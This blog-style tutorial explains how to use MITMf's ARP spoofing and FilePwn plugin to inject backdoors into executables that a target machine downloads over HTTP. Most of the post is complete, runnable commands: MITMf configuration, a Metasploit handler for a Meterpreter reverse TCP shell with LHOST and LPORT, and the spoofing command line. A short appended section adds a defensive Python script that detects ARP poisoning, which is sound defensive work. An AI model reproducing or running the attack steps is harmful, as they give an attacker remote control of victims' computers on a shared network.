Backdooring on the Fly with MITMf
Do you remember my last article on how to hook any web browser with MITMf and BeEF? Well, we are using the tool once again, but this time for auto-backdooring.
MITMf (if you don't already know) is a man-in-the-middle attack framework; the name literally stands for "Man In The Middle framework." It bundles many different tools to help you with MitM attacks. In this case, we are automatically backdooring every executable downloaded by one specific machine. Cool, eh?
We will be ARP spoofing a Windows 8.1 VM machine in this test.
Note: This only works for files downloaded over plain HTTP, so you might want to use SSLstrip+ for any HTTPS sites.
You will only need MITMf and Metasploit for this attack. MITMf can be installed either from the apt repository (apt-get install mitmf) or from the GitHub repository (git clone https://github.com/byt3bl33d3r/MITMf).
If you choose to install via apt, remember to run apt-get update first.
Metasploit is built into Kali.
Now that we have MITMf installed, we need to edit the config files to match our system. We will edit the config file located in /usr/share/mitmf/config/mitmf.cfg.
Scroll down until you get to the FilePwn section.
You can see that under the CompressedFiles section, there is a configuration for many useful payloads. Set the HOST variable to match your IP, but don't change the port. Just remember the port number for the payload you want to use.
When we run MITMf with FilePwn, we want to listen for the payload specific to the target OS. In this case, I'm targeting a Windows 8.1 machine, so I would use WindowsIntelx86. The port number for that is 8443. Remember your payload's port number for later.
We're going to be using Metasploit as our payload listener. Type use multi/handler and then set your payload. In this case, I'm using Meterpreter.
set PAYLOAD windows/meterpreter/reverse_tcp
Set the LHOST and LPORT options...
set LHOST 10.0.2.117
set LPORT 8443 (make sure you set the port number that corresponds to your chosen payload!)
Then exploit -j. Open up a new terminal...
To run the attack, use the following command:
mitmf --spoof --arp -i <interface> --gateway <gateway IP> --target <target IP> --filepwn
For me it would be:
mitmf --spoof --arp -i wlan0 --gateway 10.0.2.1 --target 10.0.2.15 --filepwn
Pretty soon you should be getting output like this:
If a user downloads a file and the file is patchable, you should get some output saying "File patched successfully. Sending to target." As soon as the victim opens the file, you should get a Meterpreter prompt.
If the output doesn't say the file was patched, it couldn't be patched. Unfortunately, this tactic doesn't work 100% of the time.
Now we know how to run a very neat trick: backdooring on the fly. This gets even better if you do this via mobile, as you will be very discreet. Don't abuse this power. As said in the help menu for MITMf quoting Yoda, "Use wisely, young padawan."
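From the other side of the wire, the ARP spoofing that makes this attack possible leaves a visible trace on the victim: the gateway's IP suddenly resolves to a MAC address that also belongs to another host on the LAN. The following is an added example (not from MITMf or the original post) that parses two snapshots of Linux `ip neigh show` output and raises alerts on exactly those symptoms; the ARP entries and MAC addresses are constructed sample data, and the gateway/attacker IPs reuse the addresses from this article.

```python
"""Spot ARP-cache poisoning symptoms from `ip neigh show` snapshots (added example)."""
import re
from collections import defaultdict

# Constructed sample: neighbour table before the attack...
BASELINE = """\
10.0.2.1 dev wlan0 lladdr 52:54:00:12:35:00 REACHABLE
10.0.2.20 dev wlan0 lladdr 08:00:27:aa:bb:cc STALE
"""
# ...and after poisoning: the gateway now shares a MAC with 10.0.2.117 (the attacker box).
POISONED = """\
10.0.2.1 dev wlan0 lladdr 08:00:27:de:ad:01 REACHABLE
10.0.2.20 dev wlan0 lladdr 08:00:27:aa:bb:cc STALE
10.0.2.117 dev wlan0 lladdr 08:00:27:de:ad:01 REACHABLE
"""

# Matches "<ip> dev <iface> lladdr <mac> ..."; FAILED/INCOMPLETE rows have no lladdr and are skipped.
LINE_RE = re.compile(r"^(\S+) dev (\S+) lladdr ([0-9a-f:]{17})", re.I)


def parse_neigh(text):
    """Return {ip: mac} for every resolved entry in an `ip neigh show` dump."""
    table = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            table[m.group(1)] = m.group(3).lower()
    return table


def arp_alerts(baseline, current, gateway):
    """Compare two snapshots and describe anything that looks like gateway spoofing."""
    alerts = []
    old, new = parse_neigh(baseline), parse_neigh(current)
    # Symptom 1: the gateway's MAC changed between polls (arpwatch-style "changed ethernet address").
    if gateway in old and gateway in new and old[gateway] != new[gateway]:
        alerts.append(f"gateway {gateway} MAC changed {old[gateway]} -> {new[gateway]}")
    # Symptom 2: one MAC claims the gateway IP and another IP at the same time.
    by_mac = defaultdict(list)
    for ip, mac in new.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if gateway in ips and len(ips) > 1:
            others = ", ".join(ip for ip in ips if ip != gateway)
            alerts.append(f"MAC {mac} claims gateway {gateway} and also {others}")
    return alerts


if __name__ == "__main__":
    for alert in arp_alerts(BASELINE, POISONED, "10.0.2.1"):
        print("ALERT:", alert)
```

Run it periodically against live `ip neigh show` output (or feed it `arp -a` after adjusting the regex) and either alert hits immediately while MITMf is spoofing.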
C|H of C3
NOTE: This has been sitting in my drafts for a month now. I've been waiting to post this for a long time.